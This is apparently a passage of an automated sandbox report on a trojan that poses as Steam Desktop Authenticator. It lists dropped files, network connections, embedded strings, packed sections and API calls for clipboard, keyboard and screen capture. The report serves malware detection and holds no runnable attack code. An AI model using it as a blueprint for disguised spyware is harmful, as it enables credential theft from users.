                      Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.306921781.0000000000968000.00000004.00000020.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: Nb2HQZZDIf.exeString found in binary or memory: https://sectigo.com/CPS0C
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, Nb2HQZZDIf.exeString found in binary or memory: https://sectigo.com/CPS0D
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                      Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307504905.0000000002D90000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385633709.0000000002B1F000.00000004.00000001.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.25.233.53:443 -> 192.168.2.3:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.216.94.27:443 -> 192.168.2.3:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.217.80.20:443 -> 192.168.2.3:49747 version: TLS 1.2
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400053A0 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140005280 GetClipboardFormatNameW,GetClipboardData,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140042E80 GetSystemMetrics,GetSystemMetrics,GetDC,DestroyCursor,DeleteObject,GetIconInfo,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140011052 GetKeyboardState,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400018BA GlobalUnWire,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,GetKeyState,GetKeyState,GetKeyState,IsDlgButtonChecked,IsDlgButtonChecked,PostMessageW,IsDlgButtonChecked,IsDlgButtonChecked,IsDialogMessageW,GetTickCount,KillTimer,ShowWindow,GetTickCount,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,ShowWindow,DragQueryFileW,DragFinish,DragFinish,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CountClipboardFormats,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsDlgButtonChecked,ScreenToClient,IsDlgButtonChecked,IsDlgButtonChecked,GetWindowRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetWindowLongW,SetWindowLongW,MulDiv,MulDiv,IsDlgButtonChecked,ShowWindow,DragFinish,GetWindowLongW,SetWindowLongW,

                      System Summary:

                      barindex
                      .NET source code contains very large stringsShow sources
                      Source: 1234.exe.0.dr, uNotepad/CollectionToSort.csLong String: Length: 32771
                      Source: 2.0.1234.exe.cf0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                      Source: 2.2.1234.exe.cf0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                      Source: 14.2.1234.exe.2e0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                      Source: 14.0.1234.exe.2e0000.0.unpack, uNotepad/CollectionToSort.csLong String: Length: 32771
                      PE file contains section with special charsShow sources
                      Source: srvs.exe.15.drStatic PE information: section name:
                      Source: srvs.exe.15.drStatic PE information: section name:
                      Source: srvs.exe.15.drStatic PE information: section name:
                      Sample or dropped binary is a compiled AutoHotkey binaryShow sources
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeWindow found: window name: AutoHotkey
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140043AD0 RegisterClipboardFormatW,MoveWindow,GetSysColor,SetBkColor,SetTextColor,GetSysColorBrush,CreateCompatibleDC,SelectObject,BitBlt,SelectObject,DeleteDC,DrawIconEx,ExcludeClipRect,CreateRectRgn,GetClipRgn,GetSysColorBrush,FillRgn,DeleteObject,GetClipBox,FillRect,GetClientRect,MoveWindow,MoveWindow,MoveWindow,InvalidateRect,ShowWindow,GetMenu,CheckMenuItem,NtdllDefWindowProc_W,SendMessageTimeoutW,PostMessageW,PostMessageW,SendMessageTimeoutW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004438A NtdllDefWindowProc_W,PostMessageW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140043BF6 NtdllDefWindowProc_W,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140043C50 NtdllDefWindowProc_W,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140043C8B SetFocus,NtdllDefWindowProc_W,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140043CAC NtdllDefWindowProc_W,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140043CD9 NtdllDefWindowProc_W,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400492B0: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140019030
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140060290
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400184C0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140004530
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400018BA
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140043AD0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140036D50
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140014FF0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400A7FF8
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140049040
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140053050
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D080
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140008140
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140083150
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400861F0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014003C220
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140042240
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014002B25C
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014000C260
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140048270
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004B270
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014008B280
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014000A2B0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400222C0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400132C0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004C2D0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400302E0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014000F2E0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014003A300
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140020316
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014005E330
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014003B32A
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014006C33D
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140033380
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140096390
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400563A0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400883F0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400B9420
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004A480
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400424B0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400414B0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400B04B4
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400344D0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140059510
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014005E580
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014002D585
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014001D5A9
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400695C0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400465D0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400665E0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140023630
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140058650
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014003B654
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400AE660
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014006D6A0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C2698
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C26B0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C26A8
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400096E0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140056719
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400577A0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400727F0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140054860
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014005E8F0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140030910
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014006C920
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140006938
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014000693C
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140006940
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004D990
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400059D0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014005F9F2
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140071A10
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140019A2E
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400BBA40
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140047AB0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140060AF0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140049B40
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400B7B9C
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014002FBFC
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140059C00
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140055C10
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014000CC10
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014005FC25
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140038C50
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004BC60
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400BDCA8
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014008BCD0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140041CD1
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140045CF0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400A7D2C
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004FD30
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014003ED70
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140079D90
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140065D90
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400A0DC0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014002ADE6
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140035E60
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140090E70
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140067E62
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140051E80
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140042E80
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140060EF0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014004AF20
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014003CF20
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140010F60
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140046F70
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_000000014001BF80
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140044FB0
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_3_009B4181
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_00CF944F
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_00CF9D5B
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0160C534
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0160E972
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0160E978
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0790BB38
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0790B638
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07905252
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07903E72
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07909269
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_079049D8
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07902113
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07905C80
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07902C30
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0790933F
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07909326
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0790A68B
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0790EAD0
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07908E58
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07908E48
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0790A66C
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_079085B8
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_079095C7
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_079085C8
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07904941
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_079090D0
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_079090C0
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07908C38
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_0790C028
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_07908C28
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_08F38864
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_08F3BDC0
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_08F3B250
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_08F3BD91
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_08F3BD40
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_08F3D0A0
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_08F3B24B
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_08F3D778
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 2_2_08F3D767
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 14_2_002E944F
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 14_2_002E9D5B
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_0068944F
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_00689D5B
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_0297D448
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_0297CB50
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_05D50040
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_05D5F338
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_05D52840
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_05D5D308
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_05D5D2F9
                      Source: C:\Users\user\AppData\Roaming\1234.exeCode function: 15_2_05D52831
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D0631
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D0640
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D346F
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D0910
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D0933
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D0959
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D098C
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D09BB
                      Source: C:\Users\user\AppData\Local\Temp\srvs.exeCode function: 21_2_031D09A5
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: String function: 00000001400A6D70 appears 354 times
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: String function: 0000000140086C40 appears 51 times
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: String function: 00000001400A4F28 appears 34 times
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: String function: 00000001400A9358 appears 45 times
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: String function: 0000000140035BF0 appears 107 times
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: String function: 0000000140035870 appears 77 times
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: String function: 00000001400C2598 appears 38 times
                      Source: Nb2HQZZDIf.exeStatic PE information: invalid certificate
                      Source: Nb2HQZZDIf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Nb2HQZZDIf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Nb2HQZZDIf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Nb2HQZZDIf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Nb2HQZZDIf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 1234.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: srvs.exe.15.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Nb2HQZZDIf.exe, 00000000.00000000.201173150.000000014015E000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs Nb2HQZZDIf.exe
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307447286.0000000002D80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Nb2HQZZDIf.exe
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.308499274.0000000005560000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Nb2HQZZDIf.exe
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307537646.0000000002D98000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameOtxiH.exe2 vs Nb2HQZZDIf.exe
                      Source: Nb2HQZZDIf.exeBinary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs Nb2HQZZDIf.exe
                      Source: 1234.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Nb2HQZZDIf.exeStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00032224103
                      Source: srvs.exe.15.drStatic PE information: Section: ZLIB complexity 0.999643083756
                      Source: srvs.exe.15.drStatic PE information: Section: .vimp0 ZLIB complexity 0.997845143779
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/60@15/8
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_00000001400C22C0 GetDiskFreeSpaceW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeCode function: 0_2_0000000140088BA0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,
                      Source: C:\Users\user\Desktop\Nb2HQZZDIf.exeFile created: C:\Users\user\AppData\Roaming\fieldJump to behavior
                      Source: C:\Users\user\AppData\Roaming\1234.exeFile created: C:\Users\user\AppData\Local\Temp\tmp253A.tmpJump to behavior
